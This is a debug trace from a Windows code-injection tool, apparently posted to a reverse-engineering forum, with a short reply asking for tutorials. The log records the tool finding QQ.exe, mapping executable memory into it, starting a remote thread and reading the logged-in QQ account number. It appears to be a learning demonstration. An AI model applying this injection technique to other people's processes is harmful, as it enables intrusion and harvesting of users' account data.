00000091 10.54484558 [5112] MyIAT:Process32Next (handle,addr info)
00000092 10.54488277 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000093 10.54491138 [5112] MyIAT:Process32Next (handle,addr info)
00000094 10.54494762 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000095 10.54497719 [5112] MyIAT:Process32Next (handle,addr info)
00000096 10.54501247 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000097 10.54504395 [5112] MyIAT:Process32Next (handle,addr info)
00000098 10.54507923 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000099 10.54510880 [5112] MyIAT:Process32Next (handle,addr info)
00000100 10.54514408 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000101 10.54517365 [5112] MyIAT:Process32Next (handle,addr info)
00000102 10.54521084 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000103 10.54524136 [5112] MyIAT:Process32Next (handle,addr info)
00000104 10.54527664 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000105 10.54530716 [5112] MyIAT:Process32Next (handle,addr info)
00000106 10.54534245 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000107 10.54537201 [5112] MyIAT:Process32Next (handle,addr info)
00000108 10.54540825 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000109 10.54543972 [5112] MyIAT:Process32Next (handle,addr info)
00000110 10.54547501 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000111 10.54550457 [5112] MyIAT:Process32Next (handle,addr info)
00000112 10.54554081 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000113 10.54557037 [5112] MyIAT:Process32Next (handle,addr info)
00000114 10.54560471 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000115 10.54563618 [5112] MyIAT:Process32Next (handle,addr info)
00000116 10.54567146 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000117 10.54570198 [5112] MyIAT:Process32Next (handle,addr info)
00000118 10.54573727 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000119 10.54576683 [5112] MyIAT:Process32Next (handle,addr info)
00000120 10.54580212 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000121 10.54583263 [5112] MyIAT:Process32Next (handle,addr info)
00000122 10.54586792 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000123 10.54589844 [5112] MyIAT:Process32Next (handle,addr info)
00000124 10.54593468 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000125 10.54596519 [5112] MyIAT:Process32Next (handle,addr info)
00000126 10.54600143 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000127 10.54603195 [5112] MyIAT:Process32Next (handle,addr info)
00000128 10.54607105 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000129 10.54610252 [5112] MyIAT:Process32Next (handle,addr info)
00000130 10.54613876 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000131 10.54617119 [5112] MyIAT:OpenProcess (4095,0,info.th32ProcessID)
00000132 10.54664135 [5112] MyIAT:NtMapViewOfSection (hMappedFile,hProcess1,addr ViewBase1,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE)
00000133 10.54668427 [5112] MyIAT:CreateRemoteThread (hProcess1,0,0,ViewBase1,0,0,0)
00000134 10.54684258 [5112] MyIAT:WaitForSingleObject (hRemoteThread,INFINITE)
00000135 10.54902363 [5216] Debug mode!
00000136 10.54912949 [5216] injectIAT:GetModuleHandleA ("KernelUtil.dll")
00000137 10.54917145 [5216] injectIAT:GetProcAddress (eax,"?GetSelfUin@Contact@Util@@YAKXZ")
00000138 10.54944611 [5112] MyIAT:GetExitCodeThread (hRemoteThread,addr Return_Value)
00000139 10.54951668 [5112] MyIAT:wsprintfA (addr @QQUid,"获取到QQ号:%d",Return_Value)
00000140 10.54955769 [5112] MyIAT:OutputDebugStringA (addr @QQUid)
00000141 10.54959297 [5112] 获取到QQ号:1067968022
00000142 10.54962349 [5112] MyIAT:CloseHandle (hRemoteThread)
00000143 10.54966354 [5112] MyIAT:CloseHandle (hProcess1)
00000144 10.54969597 [5112] MyIAT:Process32Next (handle,addr info)
00000145 10.54974365 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000146 10.54979992 [5112] MyIAT:OpenProcess (4095,0,info.th32ProcessID)
00000147 10.54984188 [5112] MyIAT:NtMapViewOfSection (hMappedFile,hProcess1,addr ViewBase1,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE)
00000148 10.54989052 [5112] MyIAT:CreateRemoteThread (hProcess1,0,0,ViewBase1,0,0,0)
00000149 10.55005360 [5112] MyIAT:WaitForSingleObject (hRemoteThread,INFINITE)
00000150 10.55031776 [5988] Debug mode!
00000151 10.55035591 [5988] injectIAT:GetModuleHandleA ("KernelUtil.dll")
00000152 10.55038071 [5988] injectIAT:GetProcAddress (eax,"?GetSelfUin@Contact@Util@@YAKXZ")
00000153 10.55056095 [5112] MyIAT:GetExitCodeThread (hRemoteThread,addr Return_Value)
00000154 10.55061531 [5112] MyIAT:wsprintfA (addr @QQUid,"获取到QQ号:%d",Return_Value)
00000155 10.55064774 [5112] MyIAT:OutputDebugStringA (addr @QQUid)
00000156 10.55067635 [5112] 获取到QQ号:xxxxxx隐藏
00000157 10.55070591 [5112] MyIAT:CloseHandle (hRemoteThread)
00000158 10.55073643 [5112] MyIAT:CloseHandle (hProcess1)
00000159 10.55076599 [5112] MyIAT:Process32Next (handle,addr info)
00000160 10.55080891 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000161 10.55084229 [5112] MyIAT:Process32Next (handle,addr info)
00000162 10.55088806 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000163 10.55091858 [5112] MyIAT:Process32Next (handle,addr info)
00000164 10.55095577 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000165 10.55098629 [5112] MyIAT:Process32Next (handle,addr info)
00000166 10.55102444 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000167 10.55105495 [5112] MyIAT:Process32Next (handle,addr info)
00000168 10.55109310 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000169 10.55112267 [5112] MyIAT:Process32Next (handle,addr info)
00000170 10.55116081 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000171 10.55119133 [5112] MyIAT:Process32Next (handle,addr info)
00000172 10.55123043 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000173 10.55125999 [5112] MyIAT:Process32Next (handle,addr info)
00000174 10.55129528 [5112] MyIAT:CloseHandle (handle)
00000175 10.55133057 [5112] MyIAT:CloseHandle (hProcess2)
只有本站会员才能查看附件,请 登录
6号晚上才在看雪上看到这个标题 7号在这里又看到。
大牛有时间多发点学习指导方面的帖子啊。比如汇编啊反汇编啊 逆向分析呀 c++学习啊 MFC学习啊什么什么的。